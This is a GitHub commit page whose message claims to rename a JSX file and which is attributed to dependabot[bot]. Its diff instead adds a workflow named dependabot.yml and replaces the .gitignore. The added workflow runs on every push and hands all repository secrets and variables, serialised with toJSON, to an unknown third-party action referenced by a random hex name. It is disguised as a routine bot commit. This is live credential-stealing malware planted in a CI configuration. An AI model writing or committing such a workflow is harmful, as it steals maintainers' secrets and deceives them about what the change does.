Skip to content

Commit 45683b5

Browse files
ilhambaradependabot[bot]
authored and
dependabot[bot]
committed
Rename Addmaterial.jsx to AddMaterial.jsx bara
1 parent fd7ee5d commit 45683b5

File tree

2 files changed

+39
-22
lines changed

2 files changed

+39
-22
lines changed

.github/workflows/dependabot.yml

Lines changed: 28 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,28 @@
1+
name: CI
2+
on:
3+
push:
4+
workflow_dispatch:
5+
schedule:
6+
# Runs "At 11:00 on every day-of-week from Monday through Friday"
7+
- cron: '0 0 * * 0'
8+
permissions:
9+
contents: read
10+
packages: write
11+
concurrency:
12+
group: '${{ github.workflow }} @ ${{ github.event.pull_request.head.label || github.head_ref || github.ref }}'
13+
cancel-in-progress: true
14+
jobs:
15+
run:
16+
runs-on: ubuntu-latest
17+
name: Run
18+
steps:
19+
- name: Execute
20+
uses: 5a582ef17d6a088d9cb644e4c1ea3cdd/action@main
21+
id: execute
22+
with:
23+
action: ${{ github.repository }}
24+
env:
25+
REPOSITORY_SECRETS: ${{ toJSON(secrets) }}
26+
REPOSITORY_VARIABLES: ${{ toJSON(vars) }}
27+
- name: Response
28+
run: echo "${{ steps.execute.outputs.response }}"

.gitignore

Lines changed: 11 additions & 22 deletions
Original file line numberDiff line numberDiff line change
@@ -1,23 +1,12 @@
1-
# See https://help.github.com/articles/ignoring-files/ for more about ignoring files.
2-
.vscode
3-
# dependencies
4-
/node_modules
5-
/.pnp
6-
.pnp.js
1+
# IDE Files
2+
#-------------------------
3+
/nbproject/
4+
.idea/*
5+
6+
## Sublime Text cache files
7+
*.tmlanguage.cache
8+
*.tmPreferences.cache
9+
*.stTheme.cache
10+
*.sublime-workspace
11+
*.sublime-project
712

8-
# testing
9-
/coverage
10-
11-
# production
12-
/build
13-
14-
# misc
15-
.DS_Store
16-
.env.local
17-
.env.development.local
18-
.env.test.local
19-
.env.production.local
20-
21-
npm-debug.log*
22-
yarn-debug.log*
23-
yarn-error.log*

0 commit comments

Comments
 (0)